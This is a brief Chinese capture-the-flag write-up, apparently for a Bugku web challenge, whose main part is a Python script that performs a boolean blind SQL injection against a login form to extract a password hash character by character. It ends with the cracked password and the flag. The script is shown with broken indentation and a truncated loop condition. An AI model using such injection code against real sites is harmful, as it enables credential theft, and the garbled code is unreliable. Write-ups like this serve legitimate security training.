0、打开网页,查看题目描述
描 述: 全都过滤了绝望吗?
根据描述,说明是盲注
1、编写python脚本,运行获取密码
import requests
session = requests.Session()
url="http://114.67.246.176:15649//login.php"
flag=''
for i in range(1,250):
left=32
right=128
mid=(left+right)//2
while(left
payload="admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1"%(i,mid)
data = {'uname': payload, 'passwd': 'admin'}
res = requests.post(url, data=data)
if 'password' in res.text:
left=mid+1
else:
right=mid
mid=(left+right)//2
if(mid==32 or mid==127):
break
flag=flag+chr(mid)
print(flag)
2、进行md5解密
得到密码:bugkuctf
3、登陆网页,cat
4、得到flag:flag{66993b2d104d9e1dd7b7d9ffc69795d7}